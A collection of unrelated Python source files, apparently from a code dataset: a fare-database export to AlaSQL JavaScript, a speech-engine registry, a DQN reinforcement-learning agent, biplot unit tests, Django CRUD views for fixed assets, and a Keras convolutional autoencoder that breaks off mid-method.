    # Category is keyed off the numeric code; anything unknown is "low".
    categories = {1: "mid", 2: "high"}
    ranges = []
    for code, name, start, end in rows:
        ranges.append({
            "code": code,
            "name": name,
            "start": start,
            "end": end,
            "category": categories.get(code, "low"),
        })
    return ranges
def get_fares(conn):
    """Fetch every fare entry, ordered by origin station."""
    sql = """
    SELECT origen, destino, rango, usuario, valor FROM tarifa ORDER BY origen ASC
    """
    rows = query(conn, sql)
    return [
        {
            "from": origin,
            "to": destination,
            "range": fare_range,
            "user": user,
            "cost": cost,
        }
        for origin, destination, fare_range, user, cost in rows
    ]
def output_json(data):
    """Serialize the aggregated database payload to a JSON string."""
    return json.dumps(data)
def output_alasql(data):
    """Render the payload as a JavaScript module that populates AlaSQL tables.

    :param data: dict with "stations", "users", "schedules", "ranges" and
        "fares" lists, as produced by the get_* helpers above
    :return: JavaScript source as a string
    """
    # Table DDL plus pre-compiled insert statements, emitted verbatim.
    create_tables = """
    alasql("CREATE TABLE stations (code number, name string, section number, time number, type number)");
    const insertStation = alasql.compile(`INSERT INTO stations VALUES(?, ?, ?, ?, ?)`);
    alasql("CREATE TABLE users (code number, name string, category string)");
    const insertUser = alasql.compile(`INSERT INTO users VALUES(?, ?, ?)`);
    alasql("CREATE TABLE schedules (origin number, destination number, day number, time number)");
    const insertSchedule = alasql.compile(`INSERT INTO schedules VALUES(?, ?, ?, ?)`);
    alasql("CREATE TABLE ranges (code number, name string, category string, start number, end number)");
    const insertRange = alasql.compile(`INSERT INTO ranges VALUES(?, ?, ?, ?, ?)`);
    alasql("CREATE TABLE fares (from number, to number, range number, user number, cost number)");
    const insertFare = alasql.compile(`INSERT INTO fares VALUES(?, ?, ?, ?, ?)`);
    """
    # One insert call per record; each fragment keeps its trailing newline.
    stations = "".join(
        f'insertStation([{s["code"]}, `{s["name"]}`, {s["section"]}, {s["time"]}, {s["type"]}]);\n'
        for s in data["stations"]
    )
    users = "".join(
        f'insertUser([{u["code"]}, `{u["name"]}`, `{u["category"]}`]);\n'
        for u in data["users"]
    )
    schedules = "".join(
        f'insertSchedule([{s["origin"]}, {s["destination"]}, {s["day"]}, {s["time"]}]);\n'
        for s in data["schedules"]
    )
    ranges = "".join(
        f'insertRange([{r["code"]}, `{r["name"]}`, `{r["category"]}`, {r["start"]}, {r["end"]}]);\n'
        for r in data["ranges"]
    )
    fares = "".join(
        f'insertFare([{f["from"]}, {f["to"]}, {f["range"]}, {f["user"]}, {f["cost"]}]);\n'
        for f in data["fares"]
    )
    js = f"""
    // Internal database using AlaSQL
    import alasql from "alasql";
    {create_tables}
    {stations}
    {users}
    {ranges}
    {fares}
    {schedules}
    export default alasql;
    """
    return js
def main():
    """Dump the whole database as an AlaSQL JavaScript module on stdout."""
    # NOTE(review): connect() returns None when the file cannot be opened,
    # in which case the get_* calls below raise AttributeError — confirm
    # whether that failure mode is acceptable for this export script.
    conn = connect()
    stations = get_stations(conn)
    users = get_users(conn)
    schedules = get_schedules(conn)
    ranges = get_ranges(conn)
    fares = get_fares(conn)
    data = {
        "stations": stations,
        "users": users,
        "schedules": schedules,
        "ranges": ranges,
        "fares": fares
    }
    # Alternative output format, kept for debugging:
    #print(output_json(data))
    print(output_alasql(data))
if __name__ == "__main__":
    main()
8162119 | from abc import ABC
from typing import Type
from elpis.engines.common.objects.interface import Interface
from elpis.engines.common.objects.model import Model
from elpis.engines.common.objects.transcription import Transcription
from elpis.engines.espnet.objects.model import EspnetModel
from elpis.engines.kaldi.objects.model import KaldiModel
from elpis.engines.kaldi.objects.transcription import KaldiTranscription
from elpis.engines.espnet.objects.transcription import EspnetTranscription
class Engine(ABC):
    """Pairing of a model class and a transcription class that together
    define a speech engine backend."""

    def __init__(self, model: Type[Model], transcription: Type[Transcription]):
        self._model = model
        self._transcription = transcription

    @property
    def model(self) -> Type[Model]:
        """Model class used by this engine."""
        return self._model

    @property
    def transcription(self) -> Type[Transcription]:
        """Transcription class used by this engine."""
        return self._transcription

    def __str__(self):
        # e.g. "KaldiEngine <class '...'> <class '...'>"
        parts = [type(self).__name__, str(type(self.model)), str(type(self.transcription))]
        return " ".join(parts)
class KaldiEngine(Engine):
    """Engine wired to the Kaldi model and transcription implementations."""
    def __init__(self):
        super().__init__(KaldiModel, KaldiTranscription)
class EspnetEngine(Engine):
    """Engine wired to the ESPnet model and transcription implementations."""
    def __init__(self):
        super().__init__(EspnetModel, EspnetTranscription)
# Registry of available engine singletons, keyed by the name used to select
# a backend.
ENGINES = {
    "kaldi": KaldiEngine(),
    "espnet": EspnetEngine(),
}
| StarcoderdataPython |
8124043 | import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from agents.common.utils import *
from agents.common.buffers import *
from agents.common.networks import *
class Agent(object):
    """An implementation of the Deep Q-Network (DQN), Double DQN agents.

    The agent owns a prediction network ``qf``, a target network
    ``qf_target``, an epsilon-greedy exploration schedule and a replay
    buffer.  ``args.algo`` selects between 'dqn' and 'ddqn' targets.
    """
    def __init__(self,
                 env,
                 args,
                 device,
                 obs_dim,
                 act_num,
                 steps=0,
                 gamma=0.99,
                 epsilon=1.0,
                 epsilon_decay=0.995,
                 buffer_size=int(1e4),
                 batch_size=64,
                 target_update_step=100,
                 eval_mode=False,
                 q_losses=list(),
                 logger=dict(),
    ):
        # NOTE(review): q_losses/logger use mutable defaults, so all Agent
        # instances constructed with the defaults share the same list/dict —
        # confirm this sharing is intentional before changing it.
        self.env = env
        self.args = args
        self.device = device
        self.obs_dim = obs_dim
        self.act_num = act_num
        self.steps = steps
        self.gamma = gamma
        self.epsilon = epsilon
        self.epsilon_decay = epsilon_decay
        self.buffer_size = buffer_size
        self.batch_size = batch_size
        self.target_update_step = target_update_step
        self.eval_mode = eval_mode
        self.q_losses = q_losses
        self.logger = logger
        # Main network
        self.qf = MLP(self.obs_dim, self.act_num).to(self.device)
        # Target network
        self.qf_target = MLP(self.obs_dim, self.act_num).to(self.device)
        # Initialize target parameters to match main parameters
        hard_target_update(self.qf, self.qf_target)
        # Create an optimizer
        self.qf_optimizer = optim.Adam(self.qf.parameters(), lr=1e-3)
        # Experience buffer
        self.replay_buffer = ReplayBuffer(self.obs_dim, 1, self.buffer_size, self.device)
    def select_action(self, obs):
        """Select an action from the set of available actions.

        Epsilon decays multiplicatively on every call, floored at 0.01.
        """
        # Decaying epsilon
        self.epsilon *= self.epsilon_decay
        self.epsilon = max(self.epsilon, 0.01)
        if np.random.rand() <= self.epsilon:
            # Choose a random action with probability epsilon
            return np.random.randint(self.act_num)
        else:
            # Choose the action with highest Q-value at the current state
            action = self.qf(obs).argmax()
            return action.detach().cpu().numpy()
    def train_model(self):
        """Sample a minibatch from the replay buffer and take one TD step."""
        batch = self.replay_buffer.sample(self.batch_size)
        obs1 = batch['obs1']
        obs2 = batch['obs2']
        acts = batch['acts']
        rews = batch['rews']
        done = batch['done']
        if 0:   # Check shape of experiences
            print("obs1", obs1.shape)
            print("obs2", obs2.shape)
            print("acts", acts.shape)
            print("rews", rews.shape)
            print("done", done.shape)
        # Prediction Q(s)
        q = self.qf(obs1).gather(1, acts.long()).squeeze(1)
        # Target for Q regression
        if self.args.algo == 'dqn':      # DQN: max over target network's Q-values
            q_target = self.qf_target(obs2)
        elif self.args.algo == 'ddqn':   # Double DQN: main net selects, target net evaluates
            q2 = self.qf(obs2)
            q_target = self.qf_target(obs2)
            q_target = q_target.gather(1, q2.max(1)[1].unsqueeze(1))
        # Bellman backup; (1-done) zeroes the bootstrap at terminal states.
        q_backup = rews + self.gamma*(1-done)*q_target.max(1)[0]
        q_backup.to(self.device)
        if 0:   # Check shape of prediction and target
            print("q", q.shape)
            print("q_backup", q_backup.shape)
        # Update perdiction network parameter
        qf_loss = F.mse_loss(q, q_backup.detach())
        self.qf_optimizer.zero_grad()
        qf_loss.backward()
        self.qf_optimizer.step()
        # Synchronize target parameters 𝜃‾ as 𝜃 every C steps
        if self.steps % self.target_update_step == 0:
            hard_target_update(self.qf, self.qf_target)
        # Save loss
        self.q_losses.append(qf_loss.item())
    def run(self, max_step):
        """Run one episode (at most *max_step* steps).

        Returns (steps_taken, total_reward).  In eval mode the greedy policy
        is used and no learning happens.
        """
        step_number = 0
        total_reward = 0.
        obs = self.env.reset()
        done = False
        # Keep interacting until agent reaches a terminal state.
        while not (done or step_number == max_step):
            if self.args.render:
                self.env.render()
            if self.eval_mode:
                # Greedy action, no exploration and no buffer writes.
                q_value = self.qf(torch.Tensor(obs).to(self.device)).argmax()
                action = q_value.detach().cpu().numpy()
                next_obs, reward, done, _ = self.env.step(action)
            else:
                self.steps += 1
                # Collect experience (s, a, r, s') using some policy
                action = self.select_action(torch.Tensor(obs).to(self.device))
                next_obs, reward, done, _ = self.env.step(action)
                # Add experience to replay buffer
                self.replay_buffer.add(obs, action, reward, next_obs, done)
                # Start training when the number of experience is greater than batch_size
                if self.steps > self.batch_size:
                    self.train_model()
            total_reward += reward
            step_number += 1
            obs = next_obs
        # Save logs
        # NOTE(review): np.mean of an empty q_losses list (e.g. eval before
        # any training) yields NaN with a warning — confirm callers tolerate it.
        self.logger['LossQ'] = round(np.mean(self.q_losses), 5)
        return step_number, total_reward
| StarcoderdataPython |
3238145 | <filename>test/test_biplot.py<gh_stars>1-10
import unittest
import numpy as np
import pandas as pd
from biofes.biplot import *
from biofes import biplot
from scipy import stats
class test_functions(unittest.TestCase):
    """Checks for the free helper functions in biofes.biplot against
    direct numpy reference implementations on random input."""

    def test_standardize(self):
        """standardize(meth=1) must equal the usual z-score transform."""
        A = np.random.uniform(-300,300,size=(300,30))
        A_st = standardize(A, meth=1)
        A_ref = (A-A.mean(axis = 0))/A.std(axis = 0)
        self.assertAlmostEqual(np.mean(A_ref - A_st), 0, msg='standardization error')
    def test_Factor2Binary(self):
        """Factor2Binary must match pandas one-hot encoding."""
        target = list(np.random.randint(np.random.randint(2, 10), size = 100))
        Z = Factor2Binary(target,Name = None)
        Z_ref = pd.get_dummies(target)
        self.assertAlmostEqual(np.mean(Z_ref.values - Z.values), 0, msg='Factor2Binary error')
    def test_matrixsqrt(self):
        """matrixsqrt must reproduce the truncated-SVD (inverse) square root."""
        A = np.random.randint(low = 0, high = 200, size=(300, 30))
        d = np.random.randint(30)
        tol = np.finfo(float).eps
        Sinv = matrixsqrt(A, d, tol, inv=True)
        U, Sigma, VT = SVD(A, d, niter=5, state=0)
        nz = Sigma > tol        # keep only numerically non-zero singular values
        Sinv_ref = U.dot(np.diag(1/np.sqrt(Sigma[nz]))).dot(VT[nz,:])
        self.assertAlmostEqual(np.mean(Sinv_ref - Sinv), 0, delta=1e-3, msg='matrixsqrt (inv=True) error')
        ###############################################################################
        A = np.random.randint(low = 0, high = 200, size=(300, 30))
        d = np.random.randint(30)
        tol = np.finfo(float).eps
        S = matrixsqrt(A, d, tol, inv=False)
        U, Sigma, VT = SVD(A, d, niter=5, state=0)
        nz = Sigma > tol
        S_ref = U.dot(np.diag(np.sqrt(Sigma[nz]))).dot(VT[nz,:])
        self.assertAlmostEqual(np.mean(S_ref - S), 0, delta=1e-3, msg='matrixsqrt (inv=False) error')
class test_biplot(unittest.TestCase):
    """Numerical regression tests for the biofes.biplot classes.

    Each test rebuilds the reference decomposition with raw numpy on random
    input and compares it against the corresponding biofes class, so the
    tolerances are deliberately loose.

    Fixes in this revision: two NameErrors (`EV` in test_Classic,
    `cf`/`BCla.RowCont` in test_CA) that were silently swallowed by the
    surrounding `except: pass`, which skipped those assertions entirely;
    and `numpy.` calls replaced by the module's `np.` alias.
    """

    def test_Classic(self):
        """Classic biplot: dimensions, EV/inertia, contributions, coordinates."""
        n, p = np.random.randint(70,500), np.random.randint(30,50)
        A = np.random.uniform(-300,300,size=(n,p))
        d = np.random.randint(p)
        a = np.random.random(1)[0]
        methods = [None, 1]
        m = methods[np.random.randint(2)]
        data_st = standardize(A, m)
        U, Sigma, VT = SVD(data_st, d, niter = 35, state = 0)
        EV_ref = np.power(Sigma,2)
        Inert_ref = EV_ref/np.sum(EV_ref) * 100
        # Contributions
        R = U.dot(np.diag(Sigma[:d]))
        C = np.transpose(VT).dot(np.diag(Sigma[:d]))
        sf = np.sum(np.power(A,2),axis=1)
        cf = np.zeros((n,d))
        for k in range(0,d):
            cf[:,k] = np.power(R[:,k],2)*100/sf
        sc = np.sum(np.power(A, 2),axis=0)
        cc = np.zeros((p,d))
        for k in range(0,d):
            cc[:,k] = np.power(C[:,k],2)*100/sc
        # Coordinates
        R = R.dot(np.diag(np.power(Sigma,a)))
        C = C.dot(np.diag(np.power(Sigma,1-a)))
        sca = np.sum(np.power(R,2))/n
        scb = np.sum(np.power(C,2))/p
        scf = np.sqrt(np.sqrt(scb/sca))
        RowCoord_ref = R*scf
        ColCoord_ref = C/scf
        # biplot from biofes
        BCla = biplot.Classic(data = A ,dim = d, alpha = a, method = m, niter = 35, state = 0)
        # DIMENSION TEST
        self.assertEqual(BCla.RowCoord.shape, (n, d), msg='dimension output error (Classic Biplot)')
        self.assertEqual(BCla.ColCoord.shape, (p, d) , msg='dimension output error (Classic Biplot)')
        self.assertEqual(len(BCla.Inert), d, msg='dimension output error (Classic Biplot)')
        self.assertEqual(len(BCla.EV) , d, msg='dimension output error (Classic Biplot)')
        # INERTIA / EV TEST
        try:
            # BUG FIX: previously read `(EV_ref - EV)` with `EV` undefined;
            # the NameError was swallowed below and the assertions never ran.
            if str((EV_ref - BCla.EV).mean()) == 'nan':
                pass
            else:
                self.assertAlmostEqual(np.mean(EV_ref - BCla.EV), 0, msg='EV error')
                self.assertAlmostEqual(np.mean(Inert_ref - BCla.Inert), 0, msg='Inertia error')
        except:
            pass
        # CONTRIBUTIONS TEST
        try:
            if str((cf - BCla.RowCont).mean()) == 'nan':
                pass
            else:
                els = cf.shape[0]*cf.shape[1]
                self.assertAlmostEqual(np.mean(cf - BCla.RowCont), 0, delta=els*(1e-2), msg='Row Contributions error')
                els = cc.shape[0]*cc.shape[1]
                self.assertAlmostEqual(np.mean(cc - BCla.ColCont), 0, delta=els*(1e-2), msg='Column Contributions error')
        except:
            pass
        # COORDINATES TEST
        self.assertAlmostEqual(np.mean(RowCoord_ref - BCla.RowCoord), 0, delta=1e-3, msg='Row Coordinates error')
        self.assertAlmostEqual(np.mean(ColCoord_ref - BCla.ColCoord), 0, delta=1e-3, msg='Col Coordinates error')

    def test_Canonical(self):
        """Canonical biplot: coordinates, weights, EV/inertia, Wilks, radii."""
        n, m = np.random.randint(70,500), np.random.randint(10,50)
        A = np.random.uniform(-300,300,size=(n,m))
        target = list(np.random.randint(np.random.randint(2, 10), size = A.shape[0]))
        gn = list(set(target))
        g = len(gn)
        d = np.random.randint(len(gn)+1, m)
        methods = [None, 1]
        met = methods[np.random.randint(2)]
        data_std = standardize(A, met)
        r = np.array([len(gn) - 1, m]).min()
        #Groups to Binary
        Z = Factor2Binary(target)
        ng = Z.sum(axis=0)
        S11 = (Z.T).dot(Z).values
        Xb = np.linalg.inv(S11).dot(Z.T).dot(data_std)
        B = (Xb.T).dot(S11).dot(Xb)
        S = (data_std.T).dot(data_std) - B
        Y = np.power(S11,0.5).dot(Xb).dot(matrixsqrt(S,d,inv=True))
        U, Sigma, VT = SVD(Y, d, niter = 15, state = 0)
        #Variable_Coord
        H = matrixsqrt(S, d, inv=False).dot(np.transpose(VT[0:r,:]))
        #Canonical_Weights
        B = matrixsqrt(S, d, inv=True ).dot(np.transpose(VT[0:r,:]))
        #Group_Coord
        J = Xb.dot(B)
        #Individual_Coord
        V = data_std.dot(B)
        sct = np.diag((V.T).dot(V))
        sce = np.diag((J.T).dot(S11).dot(J))
        scr = sct -sce
        fs = (sce/(g - 1))/(scr/(n - g))
        #eigenvectors
        vprop = Sigma[:r]
        #Inertia
        iner = (np.power(vprop,2)/(np.power(vprop,2).sum()))*100
        lamb = np.power(vprop,2)
        pill = 1/(1 + lamb)
        pillai = np.linalg.det(np.diag(pill))
        glh = g - 1
        gle = n - g
        t = np.sqrt((np.power(glh,2) * np.power(m,2) - 4)/(np.power(m,2) + np.power(glh,2) - 5))
        w = gle + glh - 0.5 * (m + glh + 1)
        df1 = m * glh
        df2 = w * t - 0.5 * (m * glh - 2)
        # Wilks
        Wilksf = (1 - np.power(pillai,1/t))/(np.power(pillai,1/t)) * (df2/df1)
        Wilksp = stats.f.pdf(Wilksf, df1, df2)
        Wilks = {'f-val': Wilksf,'p-val': Wilksp}
        # Radius
        falfau = stats.t.ppf(1 - (0.025), (n - g))
        falfab = stats.t.ppf(1 - (0.025/(g * m)), (n - g))
        falfam = np.sqrt(stats.f.ppf(1 - 0.05, m, (n - g - m + 1)) * (((n - g) * m)/(n - g - m + 1)))
        falfac = 2.447747
        UnivRad = falfau * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
        BonfRad = falfab * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
        MultRad = falfam * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
        ChisRad = falfac * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
        Radius = {'Uni': UnivRad,'Bonf': BonfRad, 'Mult': MultRad, 'Chis': ChisRad}
        BCan = biplot.Canonical(data = A, dim = d, GroupNames = gn, y = target, method = met, niter = 35, state = 0)
        # DIMENSION TEST
        self.assertEqual(BCan.Ind_Coord.shape, (n, len(gn)-1), msg='dimension output error (Canonical Biplot) Ind_Coord')
        self.assertEqual(BCan.Var_Coord.shape, (m, len(gn)-1), msg='dimension output error (Canonical Biplot) Var_Coord')
        self.assertEqual(BCan.Group_Coord.shape, (len(gn), len(gn)-1), msg='dimension output error (Canonical Biplot) Group_Coord')
        self.assertEqual(len(BCan.inert), len(gn)-1, msg='dimension output error (Canonical Biplot)')
        # COORDINATES TEST
        els = H.shape[0]*H.shape[1]
        self.assertAlmostEqual(np.mean(H - BCan.Var_Coord), 0, delta=els*(1e-2), msg='Var Coordinates error')
        els = V.shape[0]*V.shape[1]
        self.assertAlmostEqual(np.mean(V - BCan.Ind_Coord), 0, delta=els*(1e-2), msg='Ind Coordinates error')
        els = J.shape[0]*J.shape[1]
        self.assertAlmostEqual(np.mean(J - BCan.Group_Coord), 0, delta=els*(1e-2), msg='Group Coordinates error')
        # CANONICAL WEIGHTS TEST
        els = B.shape[0]*B.shape[1]
        self.assertAlmostEqual(np.mean(B - BCan.Can_Weights), 0, delta=els*(1e-2), msg='Canonical Weights error')
        # EV / INERTIA TEST
        try:
            if str((vprop - BCan.vprop).mean()) == 'nan':
                pass
            else:
                self.assertAlmostEqual(np.mean(vprop - BCan.vprop), 0, msg='EV error')
                self.assertAlmostEqual(np.mean(iner - BCan.inert), 0, msg='Inertia error')
        except:
            pass
        # WILKS TEST
        self.assertAlmostEqual(Wilks['f-val'] - BCan.Wilks['f-val'], 0, delta=(1e-2), msg='f-val Wilks error')
        self.assertAlmostEqual(Wilks['p-val'] - BCan.Wilks['p-val'], 0, delta=(1e-2), msg='p-val Wilks error')
        # RADIUS
        self.assertAlmostEqual(np.mean(Radius['Uni'] - BCan.Radius['Uni']), 0, delta=(1e-3), msg='Uni Radius error')
        self.assertAlmostEqual(np.mean(Radius['Bonf'] - BCan.Radius['Bonf']), 0, delta=(1e-3), msg='Bonferroni Radius error')
        self.assertAlmostEqual(np.mean(Radius['Mult'] - BCan.Radius['Mult']), 0, delta=(1e-3), msg='Mult Radius error')
        self.assertAlmostEqual(np.mean(Radius['Chis'] - BCan.Radius['Chis']), 0, delta=(1e-3), msg='Chi-sqr Radius error')

    def test_CA(self):
        """Correspondence analysis biplot: inertia, AB, coordinates, contributions."""
        n, p = np.random.randint(100, 500), np.random.randint(50, 90)
        A = np.random.randint(np.random.randint(1,10), np.random.randint(30,200), (n,p))
        dim = np.random.randint(p)
        a = np.random.random(1)[0]
        BCA = biplot.CA(data=A, dim=dim, alpha=a ,niter=15, state=0)
        A = A / A.sum()
        dr = np.matrix(A.sum(axis=1))
        dc = np.matrix(A.sum(axis=0))
        A = A - dr.T.dot(dc)
        Dr = np.diagflat(1/np.sqrt(dr))
        Dc = np.diagflat(1/np.sqrt(dc))
        A = Dr.dot(A).dot(Dc)
        U, Sigma, VT = SVD(A, dim, niter = 15, state = 0)
        d = Sigma[:np.min(A.shape)]
        r = np.min(A.shape)
        # CONSISTENCY FIX: use the module's `np` alias (previously `numpy.`,
        # which was only available through the star-import's side effects).
        inertia = np.power(d,2)*100 / np.sum(np.power(d,2))
        U = Dr.dot(U[:,:r])
        V = Dc.dot(VT.T[:,:r])
        D = np.diagflat(d)
        A = U.dot(D)
        B = V.dot(D)
        sf = np.power(A,2).sum(axis = 1)
        cf = np.linalg.inv(np.diagflat(sf)).dot(np.power(A,2))
        sc = np.power(B,2).sum(axis = 1)
        cc = np.linalg.inv(np.diagflat(sc)).dot(np.power(B,2))
        A = U.dot(np.diagflat(np.power(d,a)))
        B = V.dot(np.diagflat(np.power(d,1-a)))
        # AB
        AB = A[:, :dim].dot(B[:, :dim].T)
        # Eigenvalues
        eigen_values = np.power(d,2)
        # Coordinates
        RowCoordinates = A[:, :dim]
        ColCoordinates = B[:, :dim]
        # Contributions
        RowContributions = cf[:, :dim] * 100
        ColContributions = cc[:, :dim] * 100
        # INERTIA TEST
        try:
            if str((inertia - BCA.inertia).mean()) == 'nan':
                pass
            else:
                self.assertAlmostEqual(np.mean(inertia - BCA.inertia), 0, msg='Inertia error')
                self.assertAlmostEqual(np.mean(eigen_values - BCA.eigen_values), 0, msg='eigen values error')
        except:
            pass
        # AB TEST
        self.assertAlmostEqual(np.mean(AB - BCA.AB), 0, delta=(1e-2), msg='AB error')
        # COORDINATES TEST
        els = RowCoordinates.shape[0]*RowCoordinates.shape[1]
        self.assertAlmostEqual(np.mean(RowCoordinates - BCA.RowCoordinates), 0, delta=els*(1e-2), msg='Row Coordinates error')
        els = ColCoordinates.shape[0]*ColCoordinates.shape[1]
        self.assertAlmostEqual(np.mean(ColCoordinates - BCA.ColCoordinates), 0, delta=els*(1e-2), msg='Col Coordinates error')
        # CONTRIBUTIONS TEST
        try:
            # BUG FIX: previously read `(cf - BCla.RowCont)`, referencing names
            # from test_Classic that do not exist in this method; the resulting
            # NameError was silently swallowed and the assertions never ran.
            if str((RowContributions - BCA.RowContributions).mean()) == 'nan':
                pass
            else:
                els = RowContributions.shape[0]*RowContributions.shape[1]
                self.assertAlmostEqual(np.mean(RowContributions - BCA.RowContributions), 0, delta=els*(1e-2), msg='Row Contributions error')
                els = ColContributions.shape[0]*ColContributions.shape[1]
                self.assertAlmostEqual(np.mean(ColContributions - BCA.ColContributions), 0, delta=els*(1e-2), msg='Column Contributions error')
        except:
            pass
# Allow running this test module directly with `python test_biplot.py`.
if __name__ == '__main__':
    unittest.main()
3481584 | from django.urls import reverse_lazy
from django.views.generic import (
ListView,
DetailView,
CreateView,
TemplateView,
UpdateView,
DeleteView,
)
from .models import (
ActivosFijos,
)
# Create your views here.
#<=====CRUD ActivosFijos======>
class SuccessAddActivoFijo(TemplateView):
    """Static confirmation page shown after a fixed asset is created."""
    template_name = "ppe/success-add-activo.html"
class ActivoFijo(CreateView):
    """Form view that creates an ActivosFijos (fixed asset) record."""
    model = ActivosFijos
    template_name = "ppe/add-activo.html"
    # Fields exposed on the creation form.
    fields = [
        'empresa',
        'descripcion',
        'codigo_cta',
        'mes_adquisicion',
        'ano_adquisicion',
        'valor_origen',
        'vida_util',
        'cta_contable_amort_acum',
        'amort_acum',
        'cta_contable_amort_ejercicio',
        'amort_ejercicio',
    ]
    success_url = reverse_lazy('ppe_app:success_add_activo')
class UpdateSuccessActivo(TemplateView):
    """Static confirmation page shown after a fixed asset is updated."""
    template_name = "ppe/update_activo_success.html"
class ActivoContableUpdate(UpdateView):
    """Form view that edits an existing ActivosFijos record."""
    model = ActivosFijos
    template_name = "ppe/update-activo.html"
    # Same field set as the creation form.
    fields = [
        'empresa',
        'descripcion',
        'codigo_cta',
        'mes_adquisicion',
        'ano_adquisicion',
        'valor_origen',
        'vida_util',
        'cta_contable_amort_acum',
        'amort_acum',
        'cta_contable_amort_ejercicio',
        'amort_ejercicio',
    ]
    success_url = reverse_lazy('ppe_app:success_update_activo')
class ActivoDetail(DetailView):
    """Read-only detail page for a single fixed asset."""
    model = ActivosFijos
    template_name = "ppe/detail-activo.html"
class DeleteSuccessActivo(TemplateView):
    """Static confirmation page shown after a fixed asset is deleted."""
    template_name = "ppe/delete_activo_success.html"
class ActivoDelete(DeleteView):
    """Confirmation view that deletes an ActivosFijos record."""
    model = ActivosFijos
    template_name = "ppe/delete-activo.html"
    success_url = reverse_lazy('ppe_app:success_delete_activo')
#<=====END CRUD ActivosFijos======> | StarcoderdataPython |
1719723 | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 21 13:03:42 2018
@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import SVG, display
#Import Keras objects
from keras.models import Model
from keras.layers import Input, Flatten, Reshape, Softmax
from keras.layers import Dense, UpSampling1D
from keras.layers import Conv1D, MaxPool1D
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, TensorBoard, EarlyStopping
from keras.utils.vis_utils import model_to_dot
from keras.utils import multi_gpu_model
from keras.regularizers import l1
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import keras.backend as K
from os import listdir
from os.path import isfile, join
class ModelMGPU(Model):
    """Multi-GPU Keras model that delegates weight I/O to the serial model.

    Saving/loading must go through the serial model because the multi-GPU
    replica shares its weights with it.
    """
    def __init__(self, ser_model, gpus):
        pmodel = multi_gpu_model(ser_model, gpus)
        # Adopt the parallel model's attributes so this object acts like it.
        self.__dict__.update(pmodel.__dict__)
        self._smodel = ser_model
    def __getattribute__(self, attrname):
        '''Override load and save methods to be used from the serial-model. The
        serial-model holds references to the weights in the multi-gpu model.
        '''
        # return Model.__getattribute__(self, attrname)
        if 'load' in attrname or 'save' in attrname:
            return getattr(self._smodel, attrname)
        return super(ModelMGPU, self).__getattribute__(attrname)
def jaccard(yt, yp, sm=1e-6):
    """Mean soft Jaccard index over a batch, smoothed by *sm*."""
    flat_true = K.batch_flatten(yt)
    flat_pred = K.batch_flatten(yp)
    intersection = K.sum(flat_true * flat_pred, axis=-1)
    union = K.sum(flat_true + flat_pred, axis=-1) - intersection
    return K.mean((intersection + sm) / (union + sm))
def jaccard_loss(y_true, y_pred, sm=1e-6):
    """Loss form of the Jaccard index: 1 - jaccard."""
    score = jaccard(y_true, y_pred, sm)
    return 1.0 - score
def dice(y_true, y_pred, sm=1e-6):
    """Mean soft Dice coefficient over a batch, smoothed by *sm*."""
    flat_pred = K.batch_flatten(y_pred)
    flat_true = K.batch_flatten(y_true)
    intersection = K.sum(flat_true * flat_pred, axis=-1)
    denom = K.sum(K.square(flat_true) + K.square(flat_pred), axis=-1) + sm
    return K.mean((2.0 * intersection + sm) / denom)
def dice_loss(y_true, y_pred, sm=1e-6):
    """Loss form of the Dice coefficient: 1 - dice."""
    score = dice(y_true, y_pred, sm)
    return 1.0 - score
def Wo(W,F=2,S=2):
    """Output length of a 1-D pool/conv of width F and stride S over W
    inputs, padding odd input widths by one on each side."""
    pad = W % 2
    return (W + 2 * pad - F) // S + 1
class CNAE:
    """Convolutional autoencoder over one-hot encoded SMILES-like sequences.

    Builds three linked Keras models: ``aen`` (full autoencoder), ``enc``
    (encoder to the latent representation) and ``dec`` (latent -> sequence).
    *smt* supplies ``smiLen`` (sequence length) and ``codeLen`` (alphabet
    size); *lrep* is the latent size and *nEL* the number of extra
    convolution/pool stages.
    """
    def __init__(self,smt,lrep=4, nEL=1,opt='adam',
                 ngpu=1,reg=0.001,kern=5,flt=32,batch=256,EPO=1):
        self.ngpu=ngpu
        self.EPO=EPO
        self.batch=batch
        smiLen = smt.smiLen
        codeLen = smt.codeLen
        # k tracks the temporal length as each pooling stage halves it.
        k = smiLen
        inputs = Input(shape=(smiLen,codeLen,),name='IN1')
        # Encoder: nEL conv+pool stages.
        for L in range(nEL):
            if L==0:
                x = Conv1D(flt,kern,name='C1',activation='relu',padding='same')(inputs)
            else:
                x = Conv1D(flt,kern,name=f'C{L+1}',activation='relu',padding='same')(x)
            x = MaxPool1D(2,padding='same')(x)
            k = Wo(k)
        # One final conv+pool stage before the dense bottleneck.
        x = Conv1D(flt,kern,name=f'C{nEL+1}',activation='relu',padding='same')(x)
        x = MaxPool1D(2,padding='same')(x)
        k = Wo(k)
        x = Flatten()(x)
        # L1 activity regularization encourages a sparse latent code.
        enc = Dense(lrep,name='Encoded',activation='relu',activity_regularizer=l1(reg))(x)
        # Decoder: expand latent back to the pooled feature map shape.
        x = Dense(k*flt)(enc)
        x = Reshape((k,flt,))(x)
        # k2 tracks the temporal length as each upsampling stage doubles it.
        k2 = k
        for L in range(nEL):
            x = Conv1D(flt,kern,name=f'D{L+1}',activation='relu',padding='same')(x)
            x = UpSampling1D(2)(x)
            k2 = k2 * 2
        x = Conv1D(smt.codeLen,kern,name=f'D{nEL+1}',activation='relu',padding='same')(x)
        x = UpSampling1D(2)(x)
        k2 = k2 * 2
        # Valid convolution of width f trims the upsampled length back to smiLen.
        f = k2 - smt.smiLen + 1
        x = Conv1D(smt.codeLen,f,name='outp',padding='valid')(x)
        # Per-position distribution over the alphabet.
        op = Softmax(axis=-1)(x)
        self.enc = Model(inputs,enc)
        self.aen = Model(inputs,op)
        # Rebuild the decoder from the autoencoder's last N layers.
        N = 6 + nEL * 2
        inp2 = Input(shape=(lrep,),name='IN2')
        for L in range(N):
            if L==0:
                deco = self.aen.layers[L-N](inp2)
            else:
                deco = self.aen.layers[L-N](deco)
        self.dec = Model(inp2,deco)
        # Multi-GPU wrapper only when more than one GPU was requested.
        if self.ngpu>1:
